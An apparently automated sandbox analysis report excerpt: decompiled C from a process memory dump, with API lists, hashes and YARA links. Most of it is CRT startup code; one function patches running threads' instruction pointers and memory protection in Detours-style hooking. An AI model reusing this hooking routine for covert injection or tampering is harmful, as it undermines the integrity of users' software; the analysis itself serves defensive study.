					if(__eflags != 0) {
						Sleep(0x3e8);
						continue;
					} else {
						_t56 = 1;
						_t40 = 1;
						L4:
						if( *0x2ff13070 == _t56) {
							_push(0x1f);
							L2FF123FA();
							goto L7;
						} else {
							_t38 =  *0x2ff13070;
							if(_t38 != 0) {
								 *0x2ff13088 = _t56;
								goto L7;
							} else {
								 *0x2ff13070 = _t56;
								_push(0x2ff112e4);
								_push(0x2ff112d8); // executed
								L2FF11355(); // executed
								if(_t38 != 0) {
									 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
									_t33 = 0xff;
								} else {
									L7:
									if( *0x2ff13070 == _t56) {
										_push(0x2ff112d4);
										_push(0x2ff112cc);
										L2FF11481();
										 *0x2ff13070 = 2;
									}
									if(_t40 == 0) {
										InterlockedExchange(0x2ff13074, _t40);
									}
									if( *0x2ff13080 != 0) {
										_t28 = E2FF124AF(__eflags, 0x2ff13080);
										__eflags = _t28;
										if(_t28 != 0) {
											 *0x2ff13080(0, 2, 0);
										}
									}
									_t57 =  *_acmdln;
									while(1) {
										 *((intOrPtr*)(_t59 - 0x20)) = _t57;
										_t30 =  *_t57;
										if(_t30 <= 0x20) {
											goto L18;
										}
										L14:
										if(_t30 == 0x22) {
											__eflags =  *(_t59 - 0x1c);
											 *(_t59 - 0x1c) = 0 |  *(_t59 - 0x1c) == 0x00000000;
										}
										_t35 = _t30 & 0x000000ff;
										__imp___ismbblead(_t35);
										if(_t35 != 0) {
											_t57 = _t57 + 1;
											 *((intOrPtr*)(_t59 - 0x20)) = _t57;
										}
										_t57 = _t57 + 1;
										continue;
										L18:
										__eflags = _t30;
										if(_t30 != 0) {
											__eflags =  *(_t59 - 0x1c);
											if( *(_t59 - 0x1c) != 0) {
												goto L14;
											} else {
												goto L20;
											}
											while(1) {
												L20:
												_t31 =  *_t57;
												__eflags = _t31;
												if(_t31 == 0) {
													break;
												}
												__eflags = _t31 - 0x20;
												if(_t31 <= 0x20) {
													_t57 = _t57 + 1;
													 *((intOrPtr*)(_t59 - 0x20)) = _t57;
													continue;
												}
												break;
											}
											__eflags =  *(_t59 - 0x3c) & 0x00000001;
											if(__eflags == 0) {
												_t32 = 0xa;
											} else {
												_t32 =  *(_t59 - 0x38) & 0x0000ffff;
											}
											_t30 = E2FF1159F(_t40, _t50, _t57, __eflags, 0x2ff10000, 0, _t57, _t32); // executed
											 *0x2ff13084 = _t30;
											__eflags =  *0x2ff13050;
											if( *0x2ff13050 == 0) {
												exit(_t30); // executed
												goto L14;
											}
											__eflags =  *0x2ff13088;
											if( *0x2ff13088 == 0) {
												__imp___cexit();
											}
											 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
											_t33 =  *0x2ff13084;
											goto L41;
										}
										goto L20;
									}
								}
							}
						}
						L41:
						return E2FF1153C(_t33);
					}
				}
				_t56 = 1;
				goto L4;
			}

0x2ff110ec
0x2ff110ec
0x2ff111d3
0x2ff111d5
0x2ff111da
0x2ff111df
0x2ff111e1
0x2ff111e4
0x2ff111eb
0x2ff111f1
0x2ff111f8
0x2ff11205
0x2ff1120d
0x2ff11211
0x2ff11219
0x00000000
0x00000000
0x2ff11d52
0x2ff11d54
0x2ff11d65
0x00000000
0x2ff11d56
0x2ff11d58
0x2ff11d59
0x2ff11222
0x2ff11229
0x2ff11d70
0x2ff11d72
0x00000000
0x2ff1122f
0x2ff1122f
0x2ff11236
0x2ff11ba0
0x00000000
0x2ff1123c
0x2ff1123c
0x2ff11242
0x2ff11247
0x2ff1124c
0x2ff11255
0x2ff11e17
0x2ff11e1e
0x2ff1125b
0x2ff1125b
0x2ff11262
0x2ff11264
0x2ff11269
0x2ff1126e
0x2ff11275
0x2ff11275
0x2ff11281
0x2ff11285
0x2ff11285
0x2ff11292
0x2ff11d82
0x2ff11d88
0x2ff11d8a
0x2ff11d96
0x2ff11d96
0x2ff11d8a
0x2ff1129d
0x2ff112a0
0x2ff112a0
0x2ff112a3
0x2ff112a7
0x00000000
0x00000000
0x2ff112ad
0x2ff112af
0x2ff11552
0x2ff11558
0x2ff11558
0x2ff112b5
0x2ff112b9
0x2ff112c2
0x2ff11dbb
0x2ff11dbc
0x2ff11dbc
0x2ff112c8
0x00000000
0x2ff11560
0x2ff11560
0x2ff11562
0x2ff11564
0x2ff11568
0x00000000
0x00000000
0x00000000
0x00000000
0x2ff1156e
0x2ff1156e
0x2ff1156e
0x2ff11570
0x2ff11572
0x00000000
0x00000000
0x2ff11574
0x2ff11576
0x2ff11578
0x2ff11579
0x00000000
0x2ff11579
0x00000000
0x2ff11576
0x2ff1157e
0x2ff11582
0x2ff11b9a
0x2ff11588
0x2ff11588
0x2ff11588
0x2ff11595
0x2ff11da1
0x2ff11da6
0x2ff11dad
0x2ff11db0
0x00000000
0x2ff11db0
0x2ff11df3
0x2ff11dfa
0x2ff11dfc
0x2ff11dfc
0x2ff11e02
0x2ff11e09
0x00000000
0x2ff11e09
0x00000000
0x2ff11562
0x2ff112a0
0x2ff11255
0x2ff11236
0x2ff11e23
0x2ff11e28
0x2ff11e28
0x2ff11d54
0x2ff11221
0x00000000

APIs

Part of subcall function 2FF110F6: GetModuleHandleW.KERNEL32(kernel32.dll,HeapSetInformation), ref: 2FF11109
Part of subcall function 2FF110F6: GetProcAddress.KERNEL32(00000000), ref: 2FF11110
Part of subcall function 2FF110F6: GetProcessHeap.KERNEL32(00000001,00000000,00000000), ref: 2FF11122
Part of subcall function 2FF110F6: GetSystemTimeAsFileTime.KERNEL32(?), ref: 2FF1112F
Part of subcall function 2FF110F6: GetCurrentProcessId.KERNEL32 ref: 2FF1113B
Part of subcall function 2FF110F6: GetCurrentThreadId.KERNEL32 ref: 2FF11143
Part of subcall function 2FF110F6: GetTickCount.KERNEL32 ref: 2FF1114B
Part of subcall function 2FF110F6: QueryPerformanceCounter.KERNEL32(?), ref: 2FF11157
Part of subcall function 2FF110F6: VirtualProtect.KERNELBASE(2FF11B94,00000004,00000040,?), ref: 2FF11179
Part of subcall function 2FF110F6: VirtualProtect.KERNELBASE(2FF11B94,00000004,?,?), ref: 2FF11193

GetStartupInfoA.KERNEL32(?), ref: 2FF111EB
InterlockedCompareExchange.KERNEL32(2FF13074,?,00000000), ref: 2FF11211
_initterm_e.MSVCR90 ref: 2FF1124C
_initterm.MSVCR90 ref: 2FF1126E
InterlockedExchange.KERNEL32(2FF13074,00000000), ref: 2FF11285
_ismbblead.MSVCR90 ref: 2FF112B9

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentExchangeInterlockedProcessProtectTimeVirtual$AddressCompareCountCounterFileHandleHeapInfoModulePerformanceProcQueryStartupSystemThreadTick_initterm_initterm_e_ismbblead
String ID:
API String ID: 939867607-0
Opcode ID: f0aa7b6a5d5bda671bfcb528a71b547066ade51daea2ef0ba9b5776f9bdae55e
Instruction ID: 492abaea9ca5a31c84553508cced64e029a72084b2e8d6a19a1bbde5b73495cc
Opcode Fuzzy Hash: f0aa7b6a5d5bda671bfcb528a71b547066ade51daea2ef0ba9b5776f9bdae55e
Instruction Fuzzy Hash: 9741C131D04399EBFB148BA69844B9F77BEAF05B64F11021AE641EA3A0D7B865418F60

Uniqueness

Uniqueness Score: -1.00%

Function 2FF11716, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E2FF11716(void* __ebx, void* __edi, WCHAR* __esi, void* __eflags) {
				intOrPtr* _t28;
				short _t30;
				intOrPtr* _t36;
				long _t44;
				short _t50;
				void* _t53;

				_t52 = __esi;
				_t45 = __ebx;
				_push(0x268);
				_push(0x2ff11910);
				E2FF1192C(__ebx, __edi, __esi);
				_t50 = 0;
				 *((intOrPtr*)(_t53 - 0x22c)) = 0;
				if( *0x2ff13018 != 0 ||  *0x2ff13000 != 0xffffffff) {
					L20:
					_t50 = 1;
					goto L21;
				} else {
					_t28 =  *0x2ff13040;
					if(_t28 != 0) {
						L4:
						_push(_t50);
						_push(8);
						_push(_t53 - 0x238);
						_push(1);
						_push(_t50);
						_t52 = 0x2ff13000;
						_push(0x2ff13000);
						_push(0x80000010);
						if( *_t28() == _t50) {
							L21:
							return E2FF11B1D(_t45, _t50, _t52);
						}
						_t30 =  *(_t53 - 0x238);
						if(_t30 != _t50) {
							L17:
							 *0x2ff13000 = _t30;
							_push(_t53 - 0x22c);
							_push(_t30);
							if(E2FF11A62() != 0) {
								 *((intOrPtr*)(_t53 - 4)) = _t50;
								 *((intOrPtr*)(_t53 - 0x278)) = 0x40;
								_push(_t53 - 0x278);
								_t52 = L"Comctl32.dll";
								_push(_t52);
								_push(2);
								_push(_t50);
								_push(_t50);
								if(E2FF11A97() != 0) {
									LoadLibraryW(_t52);
								}
								 *((intOrPtr*)(_t53 - 4)) = 0xfffffffe;
								E2FF11AD9(_t50);
							}
							goto L20;
						}
						_t36 = E2FF11974("GetModuleHandleExW");
						if(_t36 == _t50) {
							goto L21;
						}
						_push(_t53 - 0x230);
						_push(0x2ff13000);
						_push(6);
						if( *_t36() == 0) {
							goto L21;
						}
						 *((short*)(_t53 - 0x1e)) = 0;
						 *((short*)(_t53 - 0x20)) = 0;
						if(GetModuleFileNameW( *(_t53 - 0x230), _t53 - 0x228, 0x105) == _t50) {
							goto L21;
						}
						if( *((intOrPtr*)(_t53 - 0x20)) != _t50) {
							SetLastError(0x6f);
							goto L21;
						}
						 *((intOrPtr*)(_t53 - 0x258)) = 0x20;
						 *((intOrPtr*)(_t53 - 0x254)) = 0x88;
						 *((intOrPtr*)(_t53 - 0x250)) = _t53 - 0x228;
						 *((intOrPtr*)(_t53 - 0x244)) = 3;
						 *(_t53 - 0x23c) =  *(_t53 - 0x230);
						_push(_t53 - 0x258); // executed
						_t30 = E2FF11A2C(); // executed
						 *(_t53 - 0x238) = _t30;
						if(_t30 != 0xffffffff) {
							L16:
							 *0x2ff1301c = 1;
							goto L17;
						}
						_t44 = GetLastError();
						if(_t44 == 0x714 || _t44 == 0x715 || _t44 == 0x717 || _t44 == 0x716) {
							_t30 = 0;
							 *(_t53 - 0x238) = 0;
							goto L16;
						} else {
							goto L21;
						}
					}
					_t28 = E2FF11974("QueryActCtxW");
					 *0x2ff13040 = _t28;
					if(_t28 == 0) {
						goto L21;
					}
					goto L4;
				}
			}

0x2ff11716
0x2ff11716
0x2ff11716
0x2ff1171b
0x2ff11720
0x2ff11725
0x2ff11727
0x2ff11733
0x2ff118be
0x2ff118c0
0x00000000
0x2ff11746
0x2ff11746
0x2ff1174d
0x2ff11766
0x2ff11766
0x2ff11767
0x2ff1176f
0x2ff11770
0x2ff11772
0x2ff11773
0x2ff11778
0x2ff11779
0x2ff11782
0x2ff118c1
0x2ff118c8
0x2ff118c8
0x2ff11788
0x2ff11790
0x2ff11871
0x2ff11871
0x2ff1187c
0x2ff1187d
0x2ff11885
0x2ff11887
0x2ff1188a
0x2ff1189a
0x2ff1189b
0x2ff118a0
0x2ff118a1
0x2ff118a3
0x2ff118a4
0x2ff118ac
0x2ff11c21
0x2ff11c21
0x2ff118b2
0x2ff118b9
0x2ff118b9
0x00000000
0x2ff11885
0x2ff1179b
0x2ff117a2
0x00000000
0x00000000
0x2ff117ae
0x2ff117af
0x2ff117b0
0x2ff117b6
0x00000000
0x00000000
0x2ff117be
0x2ff117c2
0x2ff117e0
0x00000000
0x00000000
0x2ff117ea
0x2ff11c15
0x00000000
0x2ff11c15
0x2ff117f0
0x2ff117fa
0x2ff1180a
0x2ff11810
0x2ff11820
0x2ff1182c
0x2ff1182d
0x2ff11832
0x2ff1183b
0x2ff11867
0x2ff11867
0x00000000
0x2ff11867
0x2ff1183d
0x2ff11848
0x2ff1185f
0x2ff11861
0x00000000
0x00000000
0x00000000
0x00000000
0x2ff11848
0x2ff11754
0x2ff11759
0x2ff11760
0x00000000
0x00000000
0x00000000
0x2ff11760

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105,?,2FF1167B,?,2FF116A8,00000010,2FF115AD,wwlib.dll,2FF13074,?,2FF1159A,2FF10000,00000000,00000001), ref: 2FF117D8
GetLastError.KERNEL32(00000020), ref: 2FF1183D

Strings

Comctl32.dll, xrefs: 2FF1189B, 2FF118A0, 2FF11C20
, xrefs: 2FF117F0
GetModuleHandleExW, xrefs: 2FF11796
@, xrefs: 2FF1188A
QueryActCtxW, xrefs: 2FF1174F

Memory Dump Source

Source File: 00000002.00000002.462834723.000000002FF11000.00000020.00020000.sdmp, Offset: 2FF10000, based on PE: true

Associated: 00000002.00000002.462824849.000000002FF10000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.462857250.000000002FF14000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463124095.000000002FF90000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463277628.000000002FFCD000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463417896.000000003003D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastModuleName
String ID: $@$Comctl32.dll$GetModuleHandleExW$QueryActCtxW
API String ID: 2776309574-2626125606
Opcode ID: 10dbc6b8630cf392a1083fe35c2cd66d9d46a02b06138a90d2708675cd72aadb
Instruction ID: a597de822cc7f496c06c0c414d4b47c2901e0b5faa3ba4e298254e135f3987b7
Opcode Fuzzy Hash: 10dbc6b8630cf392a1083fe35c2cd66d9d46a02b06138a90d2708675cd72aadb
Instruction Fuzzy Hash: B7413030900614ABFB60DB658C88BDB7BBEAF44364F114699E118E6290DB789B84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 6D862D80, Relevance: 12.3, APIs: 8, Instructions: 256
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D862D80(intOrPtr* _a4) {
				signed int _v8;
				struct _CONTEXT _v724;
				void* _v728;
				void* _v732;
				intOrPtr _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v756;
				void* _v760;
				long _v764;
				void* __ebp;
				signed int _t136;
				void* _t139;
				void* _t142;
				intOrPtr _t145;
				void* _t165;
				void* _t173;
				signed char _t180;
				intOrPtr _t189;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				signed int _t273;
				void* _t274;

				_t136 =  *0x6d877014; // 0x6a907f72
				_v8 = _t136 ^ _t273;
				if(_a4 != 0) {
					_t238 =  *0x6d8c101c; // 0x0
					 *_a4 = _t238;
				}
				if( *0x6d8c1014 == GetCurrentThreadId()) {
					if( *0x6d8c1018 == 0) {
						_v740 = 0;
						_t239 =  *0x6d8c1024; // 0x0
						_v728 = _t239;
						while(_v728 != 0) {
							if( *((intOrPtr*)(_v728 + 4)) == 0) {
								_v736 = E6D861DA0( *((intOrPtr*)( *(_v728 + 0x10) + 0x44)),  *(_v728 + 0xc),  *((intOrPtr*)( *(_v728 + 0x10) + 0x44)));
								_t189 = E6D861D70(_v736,  *((intOrPtr*)( *(_v728 + 0x10) + 0x40)));
								_t274 = _t274 + 0x10;
								_v736 = _t189;
								 *( *(_v728 + 8)) =  *(_v728 + 0x10);
							} else {
								E6D8659E0( *(_v728 + 0xc),  *(_v728 + 0x10) + 0x20,  *( *(_v728 + 0x10) + 0x36) & 0x000000ff);
								_t274 = _t274 + 0xc;
								 *( *(_v728 + 8)) =  *(_v728 + 0xc);
							}
							_v728 =  *_v728;
						}
						_t139 =  *0x6d8c1020; // 0x0
						_v732 = _t139;
						while(_v732 != 0) {
							_v724.ContextFlags = 0x10001;
							if(GetThreadContext( *(_v732 + 4),  &_v724) != 0) {
								_t165 =  *0x6d8c1024; // 0x0
								_v728 = _t165;
								while(_v728 != 0) {
									if( *((intOrPtr*)(_v728 + 4)) == 0) {
										if(_v724.Eip >=  *(_v728 + 0xc) && _v724.Eip <  *(_v728 + 0xc) + ( *( *(_v728 + 0x10) + 0x36) & 0x000000ff)) {
											_t173 = E6D861570(_v724.Eip -  *(_v728 + 0xc) & 0x000000ff,  *(_v728 + 0x10), _v724.Eip -  *(_v728 + 0xc) & 0x000000ff);
											_t274 = _t274 + 8;
											_v724.Eip = _t173 +  *(_v728 + 0x10);
											SetThreadContext( *(_v732 + 4),  &_v724);
										}
									} else {
										if(_v724.Eip >=  *(_v728 + 0x10) && _v724.Eip <  *(_v728 + 0x10) + 4) {
											_t180 = E6D8615C0(_v728,  *(_v728 + 0x10), _v724.Eip -  *(_v728 + 0x10));
											_t274 = _t274 + 8;
											_v724.Eip =  *(_v728 + 0xc) + (_t180 & 0x000000ff);
											SetThreadContext( *(_v732 + 4),  &_v724);
										}
									}
									_v728 =  *_v728;
								}
							}
							_v732 =  *_v732;
						}
						_v756 = GetCurrentProcess();
						_t240 =  *0x6d8c1024; // 0x0
						_v728 = _t240;
						while(_v728 != 0) {
							VirtualProtect( *(_v728 + 0xc),  *( *(_v728 + 0x10) + 0x36) & 0x000000ff,  *(_v728 + 0x14),  &_v764); // executed
							FlushInstructionCache(_v756,  *(_v728 + 0xc),  *( *(_v728 + 0x10) + 0x36) & 0x000000ff);
							if( *((intOrPtr*)(_v728 + 4)) != 0 &&  *(_v728 + 0x10) != 0) {
								E6D861CC0(_v728,  *(_v728 + 0x10));
								_t274 = _t274 + 4;
								 *(_v728 + 0x10) = 0;
								_v740 = 1;
							}
							_v752 =  *_v728;
							_v744 = _v728;
							L6D864090(_v744);
							_t274 = _t274 + 4;
							_v728 = _v752;
						}
						 *0x6d8c1024 = 0;
						if(_v740 != 0 &&  *0x6d8c1010 == 0) {
							E6D861D00(); // executed
						}
						E6D8625A0();
						_t142 =  *0x6d8c1020; // 0x0
						_v732 = _t142;
						while(_v732 != 0) {
							ResumeThread( *(_v732 + 4));
							_v748 =  *_v732;
							_v760 = _v732;
							L6D864090(_v760);
							_t274 = _t274 + 4;
							_v732 = _v748;
						}
						 *0x6d8c1020 = 0;
						 *0x6d8c1014 = 0;
						if(_a4 != 0) {
							_t145 =  *0x6d8c101c; // 0x0
							 *_a4 = _t145;
						}
					} else {
						E6D862C10();
					}
				} else {
				}
				return E6D864095(_v8 ^ _t273);
			}

0x6d862d89
0x6d862d90
0x6d862d97
0x6d862d9c
0x6d862da2
0x6d862da2
0x6d862daf
0x6d862dc2
0x6d862dd3
0x6d862ddd
0x6d862de3
0x6d862df9
0x6d862e10
0x6d862e74
0x6d862e8e
0x6d862e93
0x6d862e96
0x6d862eae
0x6d862e12
0x6d862e37
0x6d862e3c
0x6d862e51
0x6d862e51
0x6d862df3
0x6d862df3
0x6d862eb5
0x6d862eba
0x6d862ed0
0x6d862edd
0x6d862eff
0x6d862f05
0x6d862f0a
0x6d862f20
0x6d862f37
0x6d862fb9
0x6d862ff6
0x6d862ffb
0x6d863007
0x6d86301e
0x6d86301e
0x6d862f39
0x6d862f48
0x6d862f78
0x6d862f7d
0x6d862f8c
0x6d862fa3
0x6d862fa3
0x6d862fa8
0x6d862f1a
0x6d862f1a
0x6d862f20
0x6d862eca
0x6d862eca
0x6d863032
0x6d863038
0x6d86303e
0x6d863044
0x6d86307a
0x6d86309e
0x6d8630ad
0x6d8630c5
0x6d8630ca
0x6d8630d3
0x6d8630da
0x6d8630da
0x6d8630ec
0x6d8630f8
0x6d863105
0x6d86310a
0x6d863113
0x6d863113
0x6d86311e
0x6d86312f
0x6d86313a
0x6d86313a
0x6d86313f
0x6d863144
0x6d863149
0x6d86314f
0x6d863162
0x6d86316f
0x6d86317b
0x6d863188
0x6d86318d
0x6d863196
0x6d863196
0x6d86319e
0x6d8631a8
0x6d8631b6
0x6d8631bb
0x6d8631c0
0x6d8631c0
0x6d862dc4
0x6d862dc4
0x6d862dc9
0x6d862db1
0x6d862db1
0x6d8631d4

APIs

GetCurrentThreadId.KERNEL32 ref: 6D862DA4
GetThreadContext.KERNEL32(?,00010001), ref: 6D862EF8

Part of subcall function 6D862C10: GetCurrentThreadId.KERNEL32 ref: 6D862C16

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: a42a0da9f61c5e18480b4f78723cc191d834d19cb31f9382583d977cc7cc374c
Instruction ID: 2e4feddb0ad3a8bb5f436d94284940345f5685eb803a71801285d81594f08716
Opcode Fuzzy Hash: a42a0da9f61c5e18480b4f78723cc191d834d19cb31f9382583d977cc7cc374c
Instruction Fuzzy Hash: 9EC13B74A0425ACFCB64DF18C98CB99B3B1BB49314F1089DAE509AB351C734EE81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D86476E, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6D86476E(void* __edx, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				E6D864EC0(0x6d875510, 0x10);
				_t34 =  *0x6d8c1074; // 0x1
				if(_t34 > 0) {
					 *0x6d8c1074 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E6D86430D();
					 *(_t80 - 4) = 1;
					__eflags =  *0x6d8c1050 - 2;
					if( *0x6d8c1050 != 2) {
						E6D864A9B(_t67, 1, _t73, 7);
						asm("int3");
						E6D864EC0(0x6d875538, 0xc);
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E6D864929( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E6D864614(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_t42 = E6D861400( *((intOrPtr*)(_t80 + 8)), _t70); // executed
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_push(_t57);
											_t45 = E6D861400( *((intOrPtr*)(_t80 + 8)), _t42);
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6D86476E(_t67, _t25);
											_pop(_t60);
											E6D864929( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E6D864614(_t60, _t67,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E6D864929( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x6d8c1074 - _t70; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E6D8643D8(_t60);
						E6D864FBC();
						E6D865024();
						 *0x6d8c1050 =  *0x6d8c1050 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E6D864803();
						_t54 = E6D864579( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E6D864810();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

0x6d86476e
0x6d864775
0x6d86477a
0x6d864781
0x6d864788
0x6d864790
0x6d864793
0x6d86479c
0x6d86479f
0x6d8647a2
0x6d8647a9
0x6d864818
0x6d86481d
0x6d864825
0x6d86482a
0x6d86482d
0x6d86482f
0x6d864840
0x6d864840
0x6d864844
0x6d864847
0x6d864853
0x6d864853
0x6d864860
0x6d864862
0x6d864865
0x6d864867
0x6d864872
0x6d864877
0x6d864879
0x6d86487c
0x6d86487e
0x00000000
0x00000000
0x6d86487e
0x6d864849
0x6d864849
0x6d86484c
0x00000000
0x6d86484e
0x6d86484e
0x6d864884
0x6d864884
0x6d864889
0x6d86488e
0x6d864890
0x6d864893
0x6d864896
0x6d864898
0x6d86489a
0x6d86489c
0x6d8648a1
0x6d8648a6
0x6d8648a8
0x6d8648a8
0x6d8648ae
0x6d8648af
0x6d8648b4
0x6d8648ba
0x6d8648ba
0x6d86489a
0x6d8648bf
0x6d8648c1
0x6d8648c8
0x6d8648d2
0x6d8648d4
0x6d8648d7
0x6d8648d9
0x6d8648e5
0x6d86490d
0x6d86490d
0x6d8648c3
0x6d8648c3
0x6d8648c6
0x00000000
0x00000000
0x6d8648c6
0x6d8648c1
0x6d86484c
0x6d864910
0x6d864917
0x6d864831
0x6d864831
0x6d864837
0x00000000
0x6d864839
0x6d864839
0x6d864839
0x6d864837
0x6d86491c
0x6d864928
0x6d8647ab
0x6d8647ab
0x6d8647b0
0x6d8647b5
0x6d8647ba
0x6d8647c1
0x6d8647c5
0x6d8647cf
0x6d8647db
0x6d8647dd
0x6d8647dd
0x6d8647df
0x6d8647e2
0x6d8647e9
0x6d8647ee
0x00000000
0x6d8647ee
0x6d864783
0x6d864783
0x6d8647f0
0x6d8647f3
0x6d8647ff
0x6d8647ff

APIs

__RTC_Initialize.LIBCMT ref: 6D8647B5
___scrt_uninitialize_crt.LIBCMT ref: 6D8647CF

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: fe1c52463cbf93edc49ec56ba937447412c934cbe239306ac08286ddb7ada7b8
Instruction ID: beed3c7df13c6264b61e8ccf1e31cc29ae02c1eb2f1800f8093eaeaa3ae84d74
Opcode Fuzzy Hash: fe1c52463cbf93edc49ec56ba937447412c934cbe239306ac08286ddb7ada7b8
Instruction Fuzzy Hash: F041B372D0C2D9EADB118F9DD818B7E76B5EBC9B79F014919F51557250C73049018BB0

Uniqueness

Uniqueness Score: -1.00%

Function 2FF1135B, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E2FF1135B() {
				signed int _t10;
				int _t11;
				void* _t17;
				intOrPtr _t20;
				intOrPtr* _t21;
				signed int _t28;
				signed int _t29;
				void* _t31;
				intOrPtr _t35;

				_t31 =  *0x2ff10000 - 0x5a4d; // 0x5a4d
				if(_t31 != 0) {
					L9:
					_t10 = 0;
				} else {
					_t20 =  *0x2ff1003c; // 0x100
					_t1 = _t20 + 0x2ff10000; // 0x4550
					_t21 = _t1;
					if( *_t21 != 0x4550) {
						goto L9;
					} else {
						_t28 =  *(_t21 + 0x18) & 0x0000ffff;
						if(_t28 != 0x10b) {
							if(_t28 != 0x20b ||  *((intOrPtr*)(_t21 + 0x84)) <= 0xe) {
								goto L9;
							} else {
								_t29 = 0;
								goto L5;
							}
						} else {
							if( *((intOrPtr*)(_t21 + 0x74)) <= 0xe) {
								goto L9;
							} else {
								_t29 = 0;
								_t35 =  *((intOrPtr*)(_t21 + 0xe8));
								L5:
								_t10 = _t29 & 0xffffff00 | _t35 != 0x00000000;
							}
						}
					}
				}
				 *0x2ff13050 = _t10;
				_t11 = __set_app_type(2);
				__imp___encode_pointer(0xffffffff); // executed
				 *0x2ff13078 = _t11;
